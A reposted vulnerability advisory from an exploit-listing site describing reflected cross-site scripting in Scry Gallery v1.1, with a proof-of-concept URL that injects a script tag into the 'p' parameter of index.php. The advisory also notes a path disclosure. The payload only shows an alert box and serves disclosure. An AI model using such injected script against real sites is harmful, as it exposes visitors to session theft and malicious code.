Advertisement






Scry Gallery XSS Vulnerability

CVE Category Price Severity
CVE-2021-39505 CWE-79 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2006-05-02
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006040104

Below is a copy:

Software : Scry Gallery v1.1
WebSite :http://scry.org/

ISSUE :
The software is prone to a XSS attack using the  following proof of concept :

http://anysiteusingscrygallery.com/[Path to scry gallery]/index.php?v=list&i=0&p=<script>var%20variable=11111111111111111
1;alert(variable);</script>

One can execute mailcious scripts using the above code in the web browser.
The above concept also aids a path disclosure to the remote attacker. This vulnerability has been tested and exits on Scry Gallery v1.1.

Additional Credits : mayank , ranjan & jha.

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum